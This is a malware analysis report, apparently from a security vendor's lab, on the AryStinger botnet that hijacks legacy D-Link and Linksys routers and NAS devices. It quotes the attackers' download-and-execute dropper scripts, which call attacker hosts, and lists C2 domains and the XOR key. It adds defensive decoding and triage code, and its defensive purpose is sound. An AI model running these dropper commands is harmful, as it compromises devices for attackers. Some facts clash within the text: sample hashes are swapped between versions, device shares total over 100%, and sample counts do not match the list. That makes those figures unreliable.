More Than 4,000 Legacy Routers Compromised by AryStinger, Turned into Global Attack Proxies for Hackers

Background

On May 20, 2026, the Ministry of State Security's WeChat official account published an article "Your internet is slow, and the culprit turns out to be this!", highlighting that outdated routers are becoming a key entry point for threat actors to conduct cyber espionage. Inspired by this article, we feel it is imperative to take the compromise of old routers seriously. This article introduces an unusual attack campaign observed within QiAnXin XLab's field of view, specifically targeting router devices based on the RTL819X series chips. The mainstream active period of the RTL819X series chips was concentrated around 2012 to 2015. The attackers exploited vulnerabilities disclosed 13 years ago to compromise a large number of old routers, building reconnaissance and attack clusters for use in the pre-intrusion footprinting stage. (Note: The campaign disclosed in this article has no direct relationship to what the Ministry of State Security described.)

Let's turn the clock back to March 12, 2026, when the XLab Network-wide Threat Awareness System detected IP 107.150.106.14 spreading a VT 0-detection ELF sample implemented in C through the old vulnerabilities CVE-2013-3307 and CVE-2016-5681. The devices affected by these two vulnerabilities are several Linksys and D-Link router models from more than 10 years ago, respectively. Unlike the common practice of exploiting IoT device vulnerabilities to build DDoS or mining botnets, this campaign aims to build an infrastructure cluster for intrusion reconnaissance activities, possessing information-gathering capabilities such as port scanning, service identification, and subdomain enumeration. On April 26, we captured a homologous sample targeting NAS devices, spread through CVE-2025-11837. This sample is implemented in Go, and its source code path hints that the project name is Ary-Attack. Based on its behavioral characteristics and technical origins, we named this unknown virus family AryStinger.

massprod_scanip.png

AryStinger is a typical bot. It communicates with the C2 server over HTTP/HTTPS protocols. Network traffic is encoded using Protobuf and supplemented with simple XOR encryption. After completing identity authentication with the C2 server and obtaining configuration updates, the program enters a standby state, waiting to execute tasks issued by the server. AryStinger supports multiple task types, including internal/external network scanning, traffic tunnel forwarding/proxying, system command execution, source-level Payloads in three languages—Go/Java/Python—as well as building persistent remote management channels through dropbear or gs-netcat. Ultimately, the infected device can be used both for internal network penetration and lateral expansion, and for launching external attacks. At the same time, it can effectively hide the attacker's true identity and physical location, becoming a key springboard in the entire attack chain that integrates concealment, relay, and offensive capabilities.

massprod_log.png

Each node running AryStinger is called an Executor. The attacker can split a massive scanning task into multiple small chunks and distribute them to different Executors for parallel execution. With this distributed-like design, the attacker can efficiently complete the early "footprinting" activities, thereby providing strong assurance for the smoothness and success rate of subsequent intrusion operations.

According to asset detection data from the QiAnXin Cyberspace Mapping Eagle Map Platform, at least 4,300 routers worldwide have already been infected, and the number is still continuously rising. It should be noted that this figure only covers AryStinger's infection situation on RTL819X-class devices; there is currently no means to measure the scale of its infection on NAS devices. We do not yet know whether, beyond the known RTL819X and NAS, there are other attack targets. In addition, AryStinger's network communication uses a hardcoded key sh_#@!_2024_secret, and whether the "2024" in it implies that the attacker began such activities as early as 2024 is likewise unknown.

Although many mysteries surrounding AryStinger remain to be solved, the mere fact of its targeted attacks against old routers is enough to define it as a real threat not to be underestimated. As the Ministry of State Security warned: "As a key device for daily internet access, once a router is illegally compromised, it will not only threaten personal privacy and property security, but may even endanger national security." Even more concerning is that this malicious sample and its associated C2 servers have an extremely low detection rate in mainstream security engines. It is precisely in view of the compounded risk of this "low detection rate" and "high potential harm" that we decided to write this article and share our research findings with the security community, in the hope of jointly addressing potential risks and safeguarding overall network security.

Infection Scale

AryStinger deploys dropbear on a specific port of the compromised device. Based on this behavioral characteristic, through asset mapping, we discovered that at least 4,300 routers worldwide have been infected.

massprod_victims.png

The infected devices are mainly D-Link routers. The affected models are shown in the table below; by country, they are mainly distributed across South Korea (48.45%), China (31.82%), Sweden (6.40%), Malaysia (3.50%), and Singapore (2.50%).

Device                                   Percent
DIR-850L                                 75%
DIR-818LW                                13%
DIR-816L, DIR-818L, DWR-118, DIR-817LW   1.3%
Unknown                                  18%

Technical Analysis

AryStinger is divided into two versions, RTL819X and Standard: the former is implemented in C, mainly targeting old routers such as Linksys and D-Link, with only massdns and tunnel functionality, making it relatively single-purpose; the latter is implemented in Go, aimed at NAS devices, with more comprehensive functionality. In addition to IP scanning, DNS scanning, and HTTP Alive scanning, it also integrates penetration tools such as fscan, ksubdomain, httpx, and Tlsx, and supports remote command execution and Payload execution. Although the two differ in language and feature set, their core working logic is essentially the same. In fact, RTL819X is a streamlined version of Standard; precisely because the performance of old routers cannot support the full functionality of the Standard version, the attacker chose to re-implement part of Standard's capabilities in C.

massprod_gopkg.png

Part1: AryStinger RTL819X Version

The script through which AryStinger RTL819X spreads via CVE-2013-3307 and CVE-2016-5681 is shown below. Its function is to first obtain the latest version number from the download server hgodpcx[.]ajb8.com, then download and execute the corresponding AryStinger sample.

#!/bin/sh
ENV="${ENV:-prod}"
BASE_URL="http://hgodpcx[.]ajb8.com"
VERSION=`wget -qO- "${BASE_URL}/${ENV}/RTL819X/latest"`
SRC_URL="${BASE_URL}/${ENV}/RTL819X/${VERSION}/syswapd0"
BIN_DIR="/tmp/bin"
BIN_PATH="${BIN_DIR}/syswapd0"
[ "$#" -gt 0 ] && CTX="$1" || CTX=""
killall -9 syswapd0h >/dev/null 2>&1 || true
killall -9 syswapd0w >/dev/null 2>&1 || true
mkdir -p "${BIN_DIR}"
rm -rf "${BIN_DIR}"/*
wget -q -O "${BIN_PATH}" "${SRC_URL}"
chmod +x "${BIN_PATH}"
"${BIN_PATH}" -b "${CTX}" >/dev/null 2>&1 &
rm -rf /tmp/cc.sh

Since March 12, we have captured a total of 32 AryStinger sample files with different version numbers. Although there are many versions, the functionality has actually changed little. This article selects V2.0.27 as the main analysis subject; below is its basic information.

MD5: abae20b26b70b526bebb5e2617092ede
MAGIC: ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
Version: 2.0.27

AryStinger supports a total of 12 different parameters, whose usage is described in detail in its usage text. Most are related to scanning, such as the concurrency of DNS scanning, the timeout duration, and the log callback domain.

massprod_usage.png

If the -d parameter is specified at runtime, daemon mode will be disabled. At this point AryStinger will print debug information in the foreground, including the version number, C2, and information related to multiple tasks such as authsvc, hbsvc, and updatesvc.

massprod_debug.png

In fact, AryStinger's core working logic is jointly composed of tasks such as authsvc, hbsvc, and watchdogsvc.

massprod_services.png

The overall workflow is as follows:

  1. AUTH (Identity Authentication)
    Sends device information to the C2 server eixfi.ajb8.com through the /auth interface for identity authentication. After authentication passes, the C2 assigns a unique Executor ID to the Bot, and from then on all communications between the Bot and the C2 will carry this ID as an identity credential.
  2. HB (Heartbeat and Configuration Update)
    Implements heartbeat reporting and configuration update functionality through the /heartbeat and /config interfaces.
  3. Watchdog (Download and Deployment)
    Downloads the dropbear program from the Download server hgodpcx.ajb8.com and deploys it to run on port 2332.
  4. Upgrade (Sample Self-Upgrade)
    Implements the automatic upgrade capability of the malicious sample.
  5. TASK (Task Pulling)
    Pulls domain probing tasks from the C2 server.
  6. WORKER (Task Execution)
    Executes the specific tasks issued by the C2.
  7. TUNNEL (Tunnel Penetration)
    Provides tunnel functionality, used to proxy or forward network traffic. This functionality was added after V2.0.27 and uses 2 additional C2s, sdkv1.dataexplore.cc and sdkv1.dataexplore.co.

The following sections will focus on the three major tasks—authsvc, watchdogsvc, and tasksvc—to analyze AryStinger's functional implementation.

① authsvc Task

The Bot collects the device's fingerprint information through the build_request_auth function, including the MAC address, device name, public address, internal address, operating system version, CPU architecture, current timestamp, and so on. This sensitive data is first encoded with Protobuf, then XOR-encrypted using the hardcoded key sh_#@!_2024_secret, and finally reported over the HTTP protocol to the C2's /auth interface. After the C2 receives the above message, if it determines that the identity authentication request comes from a real device, it will assign an Executor ID to the Bot as a credential for subsequent task dispatch.

massprod_authinfo.png

The sample we ran on our test device is V2.0.28; the request traffic it generated is shown below:

massprod_authpacket.png

After XOR decryption and Protobuf deserialization, the above traffic is shown below, corresponding exactly to our analysis.

massprod_beacon.png

The C2's response data to the above request is 63 a5 cd c2 42 81 59 33. Using the same method to decrypt it, we can see that the Executor ID assigned by the C2 to the Bot is 5785933.

{
    "2": 5785933,
    "100": 1
}
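The decryption steps described above (XOR with the hardcoded key, then Protobuf deserialization) can be reproduced with the following Python decoder. This is an added example written for this article's readers; it is not code from XLab or from the sample. It takes the 8-byte /auth response quoted above as its input and recovers the Executor ID without needing the .proto schema, by walking the Protobuf wire format field by field. The gzipped flag covers the extra Gzip layer that the Standard version adds (see Part2); that the Standard version uses the same key, and that the key restarts at offset 0 for every message, are assumptions, the latter confirmed by the fact that the quoted response decodes cleanly.

```python
import gzip
from typing import Dict, List, Tuple, Union

# Hardcoded XOR key reported in the analysis
XOR_KEY = b"sh_#@!_2024_secret"

# Captured 8-byte C2 response to the /auth request, as quoted in the article
AUTH_RESPONSE = bytes.fromhex("63a5cdc242815933")


def xor_with_key(data: bytes, key: bytes = XOR_KEY) -> bytes:
    """Repeating-key XOR. Assumes (see lead-in) that the key restarts at
    offset 0 for every message; the same call encrypts and decrypts."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def read_varint(buf: bytes, pos: int) -> Tuple[int, int]:
    """Decode a base-128 varint at buf[pos]; return (value, position after it)."""
    value, shift = 0, 0
    while True:
        if pos >= len(buf):
            raise ValueError("truncated varint")
        byte = buf[pos]
        pos += 1
        value |= (byte & 0x7F) << shift
        if not byte & 0x80:
            return value, pos
        shift += 7
        if shift > 63:
            raise ValueError("varint too long")


def decode_protobuf(buf: bytes) -> Dict[int, List[Union[int, bytes]]]:
    """Schema-less walk of the protobuf wire format. Returns {field_no: [values]};
    varint and fixed-width fields become ints, length-delimited fields stay bytes."""
    fields: Dict[int, List[Union[int, bytes]]] = {}
    pos = 0
    while pos < len(buf):
        tag, pos = read_varint(buf, pos)
        field_no, wire_type = tag >> 3, tag & 0x7
        if wire_type == 0:                       # varint
            value, pos = read_varint(buf, pos)
        elif wire_type == 1:                     # 64-bit fixed
            value, pos = int.from_bytes(buf[pos:pos + 8], "little"), pos + 8
        elif wire_type == 2:                     # length-delimited (string/bytes/message)
            length, pos = read_varint(buf, pos)
            value, pos = buf[pos:pos + length], pos + length
            if len(value) != length:
                raise ValueError("truncated length-delimited field")
        elif wire_type == 5:                     # 32-bit fixed
            value, pos = int.from_bytes(buf[pos:pos + 4], "little"), pos + 4
        else:
            raise ValueError(f"unsupported wire type {wire_type}")
        fields.setdefault(field_no, []).append(value)
    return fields


def decode_c2_message(raw: bytes, gzipped: bool = False) -> Dict[int, List[Union[int, bytes]]]:
    """RTL819X traffic: XOR -> protobuf. Standard traffic: XOR -> gunzip -> protobuf."""
    plain = xor_with_key(raw)
    if gzipped:
        plain = gzip.decompress(plain)
    return decode_protobuf(plain)


def encode_varint(value: int) -> bytes:
    out = bytearray()
    while True:
        byte = value & 0x7F
        value >>= 7
        if value:
            out.append(byte | 0x80)
        else:
            out.append(byte)
            return bytes(out)


def encode_c2_message(varint_fields: Dict[int, int], gzipped: bool = False) -> bytes:
    """Inverse of decode_c2_message for varint-only messages; useful to confirm
    a reconstructed message reproduces the captured bytes exactly."""
    plain = b"".join(encode_varint(f << 3) + encode_varint(v) for f, v in varint_fields.items())
    if gzipped:
        plain = gzip.compress(plain)
    return xor_with_key(plain)


def executor_id_from_auth_response(raw: bytes = AUTH_RESPONSE, gzipped: bool = False) -> int:
    """Field 2 of the /auth reply carries the Executor ID the C2 assigned to the bot."""
    return decode_c2_message(raw, gzipped)[2][0]


if __name__ == "__main__":
    print(decode_c2_message(AUTH_RESPONSE))      # {2: [5785933], 100: [1]}
    print(executor_id_from_auth_response())      # 5785933
```

Running the block prints the two fields shown in the JSON above: field 2 is the Executor ID 5785933 and field 100 is the status value 1. Because the XOR key is only 18 bytes long, any captured message can be decoded offline this way; the same decoder applied to the /cmd responses exposes the task parameters that the Bot is assigned, which is what makes this traffic detectable on the wire despite the encryption.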

② watchdogsvc Task

The Bot downloads dropbear (a lightweight SSH server) and dropbearkey (a key generation tool) from the Download server to the /tmp/bin/ directory, starts the dropbear SSH service on a specific local port, and configures iptables to allow traffic on that port, thereby establishing a persistent remote login backdoor for the attacker.

massprod_watchdog.png

③ tasksvc Task

The Bot obtains domain scanning tasks by sending requests to the C2's /cmd interface. This request carries the X-Executor-ID field in the HTTP header, with the value being the 5785933 assigned during the identity authentication stage, used to identify itself. AryStinger implements scanning functionality similar to massdns. It extracts parameters such as scan step size, offset, top-level domain list, scan type, subdomain length range, retry count, timeout duration, custom character set, and DNS server list from the tasks issued by the C2, constructs a task object, and hands it over to worksvc for execution. This design means the attacker can split a large-scale scanning task into multiple subtasks and distribute them to different Bots for parallel processing, thereby achieving distributed scanning.

Taking the real interactive traffic generated on the test device as an example, let's first look at the Bot's request message. The value of X-Executor-ID is precisely the 5785933 issued by the C2 during the authsvc task.

massprod_cmdpacket.png

Now let's look at the C2's response message. After the encrypted data is XOR-decrypted and Protobuf-deserialized, the task configuration can be extracted: this issuance is a .ba top-level domain brute-force task with an offset value of 11,654,000,000. This indicates that the Bot is assigned to scan the middle-front region of length-7 subdomains, covering about 12% of the scanning space within that length range.

massprod_cmd.png

After receiving this instruction, the actual Bot will launch a scan against the .ba top-level domain, generating the scanning traffic shown in the figure below. In fact, we believe that in addition to being used for domain brute-forcing, the attacker can also use this type of task to launch DDoS attacks against DNS Resolvers.

massprod_scandomain.png

Part2: AryStinger Standard Version

The script through which AryStinger Standard spreads via CVE-2025-11837 is shown below. It sets the environment variable B64 and then downloads and executes two scripts, n and t, from a remote server. Script n downloads and executes the latest version of AryStinger, while script t downloads and executes the tunnel tool.

curl -fsSL https://hgodpcx[.]ajb8.com/n | env B64=H4sIAAAAAAAA_...[omit]... bash; curl -skL https://hgodpcx[.]auq8.com/t | python

Since April 26, we have captured 22 AryStinger Standard version sample files with different version numbers. This article selects V1.0.102 as the main analysis subject; its basic information is shown below:

MD5: a5101caf0a1789d6a4bc30e644d6b152
MAGIC: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked
Packer: UPX
Version: 1.0.102

The core workflow of AryStinger Standard is concentrated in 6 functions, which can be clearly divided into two categories: one is installGSocket, and the other is multiple Loop functions (such as authLoop, cmdLoop, etc.). These functions correspond one-to-one with the RTL819X version in functionality, differing only in specific implementation. For example, the way the persistent remote management channel is built: the RTL819X version achieves it by downloading and deploying Dropbear, while the Standard version achieves it by downloading and deploying gs-netcat through main_installGSocket.

massprod_main.png

The specific function correspondence between AryStinger Standard and AryStinger RTL819X is shown in the table below. Compared with the RTL819X version, the Standard version not only adds the intranet scanning (intranetScan) function, but also expands the task types issued by the C2 from a single masscan to a total of 6 types of tasks, such as ScriptWork and HttpAliveWork.

AryStinger Standard     AryStinger RTL819X
main_authLoop           authsvc
main_cmdLoop            tasksvc
main_heartLoop          hbsvc
main_upgradeLoop        updatesvc
main_installGsocket     watchdogsvc
main_intranetScanLoop   N/A
N/A                     tunnelsvc

The following sections will revolve around the changes in the Standard version compared to the RTL819X version, briefly analyzing its functional implementation from two aspects: network communication and new features.

① Network Communication

AryStinger Standard hardcodes two C2 addresses, dybic.ajb8.com and opi7.com, with communication based on the HTTPS protocol. Its data packets are serialized using Protobuf, then Gzip-compressed and XOR-encrypted. Taking the identity authentication request initiated by the main_authLoop function as an example, the actual traffic generated is shown below:

massprod_authpacket_st.png

After the data packet is sequentially XOR-decrypted, Gunzip-decompressed, and Protobuf-decoded, what is restored is precisely the various types of sensitive information from the test device.

massprod_authinfo_st.png

② New Tasks

AryStinger Standard has greatly expanded the task types issued by the C2, increasing from the original single type to the following 6 types. The functionality of each function is directly reflected by its function name, so this article will not elaborate on them one by one, and will only give a brief explanation of the most representative one, ScriptWork.

Method ID   Function
1           ScriptWork
2           DnsWork
3           HttpAliveWork
4           HttpScanWork
5           DomainScanWrok
6           IPScanWork

ScriptWork supports executing Shell commands as well as source-level Payloads in three categories: Go, Java, and Python. This design greatly enhances the attacker's operational flexibility: there is no need to compile binary files separately for different platforms, nor to care about the specific architecture of the target device—it only needs to directly issue the source code to dynamically execute it. Whether for information gathering, persistence, or lateral movement, the attacker can quickly customize and distribute functional modules according to the actual scenario, greatly reducing the attack cost and time window.

massprod_scriptwork.png

Although this design is flexible, its drawbacks are also obvious: the execution environment is heavily dependent (e.g., Python, Java, Go). Once the environment is missing, the attacker has to perform additional download and installation operations. This not only significantly lengthens the attack chain and increases the risk of exposure, but may also directly cause the entire attack process to break down in restricted intranet or container environments. At the same time, the source code must be dropped to disk in plaintext file form, and the command line of the interpreter process will also be clearly recorded by the system audit logs. Compared with fileless, in-memory binary Payloads, the exposure surface is greatly increased, making it easier to be captured and traced by security products such as EDR and HIDS.

massprod_language.png

③ Intranet Scanning

AryStinger builds powerful intranet reconnaissance capabilities by integrating open-source tools such as Fscan and Ksubdomain. It can automatically collect key information such as system configuration, processes, network, and vulnerabilities.

massprod_collector.png

AryStinger's working directory is /tmp/bin, where it saves the open-source toolset it downloads and the results of the intranet scan. When the scan is complete, these results are sent back to the C2. Based on this aggregated intranet situational information, the attacker formulates precise subsequent intrusion or lateral movement strategies, achieving a closed loop of attack activities.

massprod_intranet.png

④ Tunnel Functionality

AryStinger Standard itself does not possess tunnel functionality. However, the Payload used in vulnerability propagation contains the command curl -skL https://hgodpcx[.]auq8.com/t. The t downloaded by this command is a Python script whose core role is to further download and execute nat_tunnel-linux-x86_64, thereby achieving tunnel penetration. The sample contains hardcoded C2 infrastructure identical to that used in the RTL819X Tunnel.

massprod_python.png

nat_tunnel-linux-x86_64 is suspected to be AI-assisted in its generation. Its hardcoded C2 is consistent with the RTL819X version's Tunnel, and its function is likewise to establish a traffic proxy or forwarding channel on the infected host.

massprod_tunnel.png

Summary

This is the core intelligence we have on the AryStinger family. Old routers have long lacked firmware updates and security maintenance. Once compromised by malware like AryStinger that possesses reconnaissance and covert control capabilities, it is equivalent to a hacker placing a permanent "invisible listening device" and "attack springboard" within your network. The attacker can thereby easily achieve the following threefold harm:

  • Theft: Silently monitoring all inbound and outbound traffic, stealing all kinds of sensitive information.

  • Hijacking: Arbitrarily tampering with DNS, directing users to phishing, pornography, gambling websites, or other virus/trojan download pages.

  • Covert Attack: Using the controlled router as a springboard to launch scanning, penetration, DDoS attacks, or spread malware against global targets, while the true attack source is difficult to trace.

There is no doubt that when a large number of old devices are gradually compromised and aggregated, ultimately forming a massive covert botnet, this will pose a continuous, covert, and highly destructive real threat to personal privacy, enterprise security, and even national critical network infrastructure.

We strongly recommend that readers immediately conduct a self-check from the following 3 levels to determine whether their system has been infected, and promptly replace or take offline old router devices whose firmware has not been updated for a long time. Please do not leave your "network gateway" open to hackers.

  • Network: Check whether there is communication with the IOC domains in this article.

  • Files: Log in to the device and check whether malicious samples exist in the /tmp/bin directory.

  • Processes: Check whether the syswapd0h or syswapd0w processes exist.
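The three checks above can be scripted. The following Python triage helper is an added example, not a tool from the article; it assumes a Linux host (such as an x86-64 NAS targeted by the Standard version) where /proc/net/tcp, /proc/*/comm and a dnsmasq-style resolver log are readable, and the sample inputs embedded in it are constructed for illustration. The indicator values (the syswapd0h/syswapd0w process names, the /tmp/bin drop directory, the dropbear port 2332 and the IOC hosts) are taken from this article.

```python
import os
import re
from typing import Dict, List, Set

# Indicators taken from the article
SUSPICIOUS_PROCESS_NAMES = {"syswapd0", "syswapd0h", "syswapd0w"}
DROP_DIR = "/tmp/bin"
DROPBEAR_PORT = 2332
IOC_HOSTS = {
    "opi7.com", "xook.ajb8.com", "xonice.ahb8.com", "eixfi.ajb8.com",
    "dybic.ajb8.com", "sdkv1.dataexplore.cc", "sdkv1.dataexplore.co",
    "hgodpcx.auq8.com", "hgodpcx.ajb8.com", "io.ary2.com",
}
TCP_LISTEN = "0A"  # socket state code for LISTEN in /proc/net/tcp

# Constructed sample inputs (not real captures): sshd on 22 and a listener on 2332
SAMPLE_PROC_NET_TCP = """  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 00000000:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 1234 1 0 100 0 0 10 0
   1: 00000000:091C 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 5678 1 0 100 0 0 10 0
   2: C0A80002:091C 6B9A0A0E:D431 01 00000000:00000000 00:00000000 00000000     0        0 5679 1 0 100 0 0 10 0
"""
SAMPLE_DNS_LOG = [
    "May 20 10:01:02 dnsmasq[512]: query[A] hgodpcx.ajb8.com from 192.168.0.10",
    "May 20 10:01:03 dnsmasq[512]: query[A] www.example.com from 192.168.0.10",
    "May 20 10:01:05 dnsmasq[512]: query[A] sdkv1.dataexplore.cc from 192.168.0.10",
]


def listening_ports(proc_net_tcp: str) -> Set[int]:
    """Return local ports in LISTEN state from /proc/net/tcp text (ports are hex)."""
    ports: Set[int] = set()
    for line in proc_net_tcp.splitlines()[1:]:  # skip the header row
        parts = line.split()
        if len(parts) < 4:
            continue
        local_addr, state = parts[1], parts[3]
        if state == TCP_LISTEN:
            ports.add(int(local_addr.rsplit(":", 1)[1], 16))
    return ports


def host_matches_ioc(host: str) -> bool:
    """True if host is an IOC host or a subdomain of one (case-insensitive)."""
    h = host.lower().rstrip(".")
    return any(h == ioc or h.endswith("." + ioc) for ioc in IOC_HOSTS)


QUERY_RE = re.compile(r"query\[[A-Z]+\]\s+(\S+)\s+from\s+(\S+)")  # dnsmasq-style line


def ioc_dns_hits(log_lines: List[str]) -> List[str]:
    """Hostnames queried that match the IOC list, in log order."""
    hits = []
    for line in log_lines:
        m = QUERY_RE.search(line)
        if m and host_matches_ioc(m.group(1)):
            hits.append(m.group(1))
    return hits


def triage(process_names: List[str], proc_net_tcp: str,
           drop_dir_entries: List[str], dns_log_lines: List[str]) -> Dict[str, List[str]]:
    """Combine the network, file and process checks; an empty dict means nothing matched."""
    findings: Dict[str, List[str]] = {}
    procs = sorted(set(process_names) & SUSPICIOUS_PROCESS_NAMES)
    if procs:
        findings["processes"] = procs
    if DROPBEAR_PORT in listening_ports(proc_net_tcp):
        findings["listener"] = [f"tcp/{DROPBEAR_PORT} (dropbear port deployed by watchdogsvc)"]
    if drop_dir_entries:
        findings["files"] = [f"{DROP_DIR}/{e}" for e in sorted(drop_dir_entries)]
    hits = ioc_dns_hits(dns_log_lines)
    if hits:
        findings["dns"] = sorted(set(hits))
    return findings


def collect_live():
    """Best-effort collection of the same inputs from the running host."""
    names = []
    for pid in os.listdir("/proc"):
        if pid.isdigit():
            try:
                with open(f"/proc/{pid}/comm") as f:
                    names.append(f.read().strip())
            except OSError:
                pass
    with open("/proc/net/tcp") as f:
        tcp = f.read()
    entries = os.listdir(DROP_DIR) if os.path.isdir(DROP_DIR) else []
    return names, tcp, entries


if __name__ == "__main__":
    names, tcp, entries = collect_live()
    print(triage(names, tcp, entries, []))  # pass your resolver's query log lines as the last argument
```

Any non-empty result deserves a closer look: a listener on tcp/2332 or files under /tmp/bin are not normal on a consumer router or NAS, and a resolver log entry for one of the IOC hosts means some device on the LAN is reaching the C2 or download infrastructure even if the router itself cannot be inspected.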

Currently, we are still digging deep into the criminal group behind AryStinger, and we welcome readers who know the inside story to provide us with more intelligence. If you are interested in our research, or wish to obtain help, you can contact us via the X platform.

IOC

C2

http://opi7.com
http://xook.ajb8.com
http://xonice.ahb8.com
http://eixfi.ajb8.com
https://dybic.ajb8.com


https://sdkv1.dataexplore.cc
https://sdkv1.dataexplore.co

Downloader

hgodpcx.auq8.com
hgodpcx.ajb8.com
io.ary2.com

Scanner IP

107.150.106.14

Manifest URL

https://hgodpcx.ajb8.com/prod/RTL819X/{version}/manifest.json
https://hgodpcx.ajb8.com/prod/standard/{version}/manifest.json

Downloader URL

http://hgodpcx.ajb8.com/prod/RTL819X/{version}/syswapd0
https://hgodpcx.ajb8.com/prod/standard/{version}/syswapd0-linux-amd64

Sample

#RTL819X
df0c9f6289e56f31c0700f40590857d3 *syswapd0_V2.0.1
98e55d712a99d2cd45e8592c6dda5110 *syswapd0_V2.0.2
10ba24db187836efe77ed7e75d279d33 *syswapd0_V2.0.3
6f761f63642cd6329a29cfad80be50c3 *syswapd0_V2.0.4
dbcc5a3e6afe41060d6357e24dc03fd3 *syswapd0_V2.0.5
a97e552f5e655e1cfa56853f65beeb0e *syswapd0_V2.0.6
c113739225ece5f6e4805466dec1401d *syswapd0_V2.0.7
0a2d2a4ec1ca2aa6a23a35abb5a75451 *syswapd0_V2.0.8
dd1e5a3cd9f842bd70be45a62c3ebbf6 *syswapd0_V2.0.9
16fed5909de4f50351fc33fbfcf156df *syswapd0_V2.0.10
6f91d1f8f0cbaab137351936b52f7a94 *syswapd0_V2.0.11
fc4cee066d8526f5806bb23278f647da *syswapd0_V2.0.12
7b361a6d0d42309d09ec9000b53712b3 *syswapd0_V2.0.13
18f894a3168ee0b809eed321a2e748b4 *syswapd0_V2.0.14
0627f034c42549e2130734b5f8dbf854 *syswapd0_V2.0.15
b9406e969cdfdaef433e93d0b9ad1f5d *syswapd0_V2.0.16
f093891e281bcd9c8016dea7d89cc671 *syswapd0_V2.0.17
9221423d7daff9e64f7e2af54f911fea *syswapd0_V2.0.18
7f2b2e3516fa454adfd51f857ae80adf *syswapd0_V2.0.20
dbdd4d8e4aef3ce69cf65ed470425c89 *syswapd0_V2.0.21
d79270ba44e665ebb0383eb77a52e38b *syswapd0_V2.0.22
36ff9f683e870145aaf5a715bc934762 *syswapd0_V2.0.23
dc35086ba0f5f83545c32a023a1f3be4 *syswapd0_V2.0.24
7461445fca3f9d8911148e0908d33c3b *syswapd0_V2.0.25
a3181550e0e0a6153a44b7a0495535b0 *syswapd0_V2.0.26
4c80d17fa5db5b1c2aaddb5351e9cb6b *syswapd0_V2.0.27
abae20b26b70b526bebb5e2617092ede *syswapd0_V2.0.28
fffcbd0ac2cb545496890f50395181ff *syswapd0_V2.0.29
a3e3197e2344c51e95c063541ea22205 *syswapd0_V2.0.30
e9916ff56074725f5739ead5091fe6c7 *syswapd0_V2.0.31


#Standard
ff11e000f377c54dea928b09ebad9df8 *syswapd0-linux-amd64-V1.0.61
fcc9de5c040307e6ac3011e8b379f6d9 *syswapd0-linux-amd64-V1.0.62
ed9209111b995cbe78f8e097c289f127 *syswapd0-linux-amd64-V1.0.63
b104a05e8a2e218adfb7654ba8bf3d49 *syswapd0-linux-amd64-V1.0.64
9660895fa3fcabbef466703636f6d51d *syswapd0-linux-amd64-V1.0.66
b0f4f813a9de094c06821366e2459aee *syswapd0-linux-amd64-V1.0.67
8cc249b16adf7e4a658af7fa31d7998e *syswapd0-linux-amd64-V1.0.68
9973676bfa9fe89aa5c76e3cd0b21ae8 *syswapd0-linux-amd64-V1.0.76
d997efa98afab2c003654b8d5ce2bedf *syswapd0-linux-amd64-V1.0.79
8deb2a60d42de0f8f8786e485d2f046f *syswapd0-linux-amd64-V1.0.80
dc71c10ca0b2c83b6b3a6a062fca314f *syswapd0-linux-amd64-V1.0.81
6869f24aecd75e2144aba8dc03dc2d0f *syswapd0-linux-amd64-V1.0.88
05627d1bddb7292bb45139244f46051f *syswapd0-linux-amd64-V1.0.89
19232d0eff3ef7aee3b5d7620c72358c *syswapd0-linux-amd64-V1.0.90
8edb3ea62a7e643ba1a88d20799cf94f *syswapd0-linux-amd64-V1.0.91
ea2fe3b409da439aec25cf7eabf5b7a7 *syswapd0-linux-amd64-V1.0.93
0ffb4b4e430f4b69216fb9d2e082e482 *syswapd0-linux-amd64-V1.0.95
5d9cdb072415b191df3f444f53b2ff4b *syswapd0-linux-amd64-V1.0.96
44805c4b36bd3d97ba8ecaf6fe103572 *syswapd0-linux-amd64-V1.0.97
d2fd89ebdad493ec9ac76ce35213cec4 *syswapd0-linux-amd64-V1.0.98
a2d54fcd0c2816f607a5962523fc648c *syswapd0-linux-amd64-V1.0.101
a5101caf0a1789d6a4bc30e644d6b152 *syswapd0-linux-amd64-V1.0.102

#Tunnel
e6b27080aa1ce1901a23dd75716d9092 *nat_tunnel-linux-x86_64